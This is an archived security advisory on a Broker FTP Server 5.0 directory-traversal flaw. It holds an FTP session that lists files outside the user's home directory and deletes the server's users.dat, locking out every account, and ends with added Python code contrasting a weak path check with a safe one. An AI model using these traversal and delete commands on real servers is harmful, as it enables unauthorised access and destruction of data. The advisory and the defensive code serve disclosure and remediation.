Broker Ftp Server 5.0 Vulnerability

2001-03-05T00:00:00
ID SECURITYVULNS:DOC:1349
Type securityvulns
Reporter Securityvulns
Modified 2001-03-05T00:00:00

Description

Vulnerability:

Users can break out of their root directory and list directories. Depending on the privileges you have, other commands such as delete may be executed outside of the home directory.

e:\crap\ was used as the home directory. Deleting files in e:\crap is enabled.

Detail:

Problem: Again relative paths.

dir: lists directories outside of the root dir. Risk: medium-high

230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden 323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission

ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 175 Nov 19 2000 UserGrps.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Users.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33 Users.4800.bak
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34 Users.4800-Prof.bak
-rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59 BannCtrl.ini
-rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08 KickCtrl.ini
-rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37 Events_1.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53 Events_lst_1.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden 629000,00KB/s

delete: deleting files outside of root dir.

ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat' deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.

C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp> :(

By deleting users.dat, no one will be able to log on ...

The put/get commands seem to be secure...

This was tested with Win2k and the trial version of Broker ver. 5.0

se00020@fhs-hagenberg.ac.at or se00020@lion.cc
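
An added example, not part of the original advisory and not Broker's code: a path resolver that treats the two probes from the transcript the way the server did (`cd ..` refused, `/../experimental/broker/data/` accepted), next to one that confines every argument to the home directory. The names `naive_resolve`, `safe_resolve` and `is_denied` are hypothetical, and the weak check is an assumption about the class of bug, since the advisory does not show the server's logic.

```python
import ntpath
import posixpath

HOME = r"e:\crap"  # home directory named in the advisory


def naive_resolve(home, cwd, arg):
    """Hypothetical weak check (assumed, not Broker's code): only a leading '..' is refused."""
    if arg.split("/")[0] == "..":
        raise PermissionError("550 No permission")
    virtual = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    rel = virtual.lstrip("/").replace("/", "\\")
    return ntpath.normpath(ntpath.join(home, rel))


def safe_resolve(home, cwd, arg):
    """Map an FTP path argument to a real path, refusing anything outside home."""
    arg = arg.replace("\\", "/")  # Windows accepts both separators
    virtual = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    parts = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:  # would climb above the virtual root
                raise PermissionError("550 No permission")
            parts.pop()
        elif ":" in comp or "\x00" in comp:  # drive letters, streams, NUL
            raise PermissionError("550 No permission")
        else:
            parts.append(comp)
    real = ntpath.normpath(ntpath.join(home, *parts))
    # Defence in depth: the final path must still sit under home.
    root = ntpath.normcase(ntpath.normpath(home))
    if ntpath.commonpath([root, ntpath.normcase(real)]) != root:
        raise PermissionError("550 No permission")
    return real


def is_denied(resolver, arg, cwd="/"):
    """True when the resolver refuses the argument."""
    try:
        resolver(HOME, cwd, arg)
    except PermissionError:
        return True
    return False
```

The same resolver has to sit in front of every path-taking command (dir, delete, cd, put, get), and a production server should also resolve junctions and other reparse points before the containment check.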